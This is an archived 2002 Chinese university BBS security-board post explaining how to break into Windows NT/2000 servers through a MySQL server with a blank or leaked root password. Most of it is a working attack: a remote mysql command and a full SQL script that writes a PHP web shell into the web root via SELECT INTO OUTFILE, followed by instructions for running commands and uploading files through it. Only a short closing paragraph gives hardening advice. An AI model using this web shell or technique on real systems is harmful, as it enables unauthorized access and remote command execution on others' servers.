● 通过mysql入侵NT和win2000 - 荔园在线 | 深圳大学学生论坛,荔园晨风BBS,深大在线网站

荔园之美，在春之萌芽，在夏之绽放，在秋之收获，在冬之沉淀

发信人: ethanwy (朽木儿), 信区: Security
标  题: 通过mysql入侵NT和win2000
发信站: 荔园晨风BBS站 (Sun Jan 20 13:54:56 2002), 转信

by coolweis
coolweis@netguard.com.cn
许多NT和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空，这就给
入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码，而IIS的一些其他漏
洞导致源代码泄漏也可能看到数据库的账号和密码。假设我们已经拿到了数据库的密码
，看看我们如何通过mysql数据库来获得该机器的一定权限。
首先通常情况下，一般mysql和php配合使用，大多数NT和win2000的机器上如果使用php
一般都会使用mysql。而默认情况下windows上的mysql是允许远程连接的。而装在linux
等上的mysql是不允许远程连接的。入侵的思路是写一个shell脚本到web目录。就可以通
过这个shell教本来执行命令了。而一般情况下，windows的web服务器是IIS,默认也是支
持asp脚本的。网上也随处可见asp的sehll脚本,只要将这个asp的脚本传到web目录就好
了。但是我觉得那些脚本都比较麻烦。而如果目标机器上面有php的话就可以用php脚本
了。在这里我用php脚本来写shell。首先我们要用mysql的客户端连结到该机器,并执行
我们的sql语句来在web目录生成php的shell脚本。
C:\mysql\bin>mysql -h xxx.xxx.xxx.xxx -uroot <php.sql
C:\mysql\bin>
下面是php.sql的内容：
use test;
create table tmp(cmd TEXT);
insert into tmp values('<body onload=document.form1.cmd.focus()><?if (isset(
$cmd)){$cmd=stripslashes($cmd);exec(\"$cmd > temp.dat\");}?><style type=\"te
xt/css\"><!\-\- .form1 {BACKGROUND: #FFFFFF; BORDER-BOTTOM: #666666 1px soli
d; BORDER-LEFT: #666666 1px solid; BORDER-RIGHT: #666666 1px solid; BORDER-T
OP: #666666 1px solid; COLOR: #3c464f; FONT-SIZE: 9pt; clip: rect( ); cursor
: text; height: auto; width: auto; margin-top: 0px; margin-right: 0px; margi
n-bottom: 0px; margin-left: 0px\-\-></style><p class=\"title2\"> </p><f
orm name=\"form1\" method=\\"post\" action=\"/cmd2.php\"> <input type=\"text
\" name=\"cmd\" size=\"50\" class=\"form1\"></form><form name=\"form2\" meth
od=\"post\" action=\"\"> <p> <textarea name=\"text\" cols=\"120\" rows=\"50\
" class=\"form1\"><?if(isset($cmd)){readfile(\"temp.dat\");unlink(\"temp.dat
\");}?></textarea> </p></form></body>');
select * from tmp into outfile 'd:\\new\\cmd2.php';
drop table tmp;
上面的sql语句是创建一个名字为tmp的table,将脚本输入到数据库，然后再将这个脚本
保存成d:\new\cmd2.php。然后删除tmp这个我们创建的table。这里的d:\new的目录是该
机器的web目录。然后我们就可以在浏览器中输入http://xxx.xxx.xxx.xxx/cmd2.php，
就可以利用这个shell执行命令了。至此我们已经获得了该网站的一个guest权限的shel
l了。我们可以通过这个shell脚本写个ftp脚本来上传文件，也可以利用这个shell来进
行其他guest权限能够执行的一些东东了。这里需要注意的是如果cmd2.php已经存在了这
个sql脚本是不能运行成功的。这个php脚本不能写成功。
关键的问题在于获得数据库的密码并且能够找到web目录。然后一切都不成问题了。
安全建议：设置mysql数据库的密码，并且要有一定的强度。设置好IIS避免泄漏源代码
，不要直接在web目录编辑脚本等文件，因为有些编辑器会自动产生一个备份文件，一般
为.bak的扩展名，这样恶意攻击者就可能直接打开这个.bak文件从而泄漏源代码，比如
global.asa.bak。

--

       \_\/                       .-==/~\
      ___/_,__,_ __ ____ ____ __)/   /{~}}
      ---,---,------------------,\'-' {{~}
                                  '-==\}/

※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.33.42]

荔园在线首页友情链接：深圳大学深大招生荔园晨风BBS S-Term软件网络书店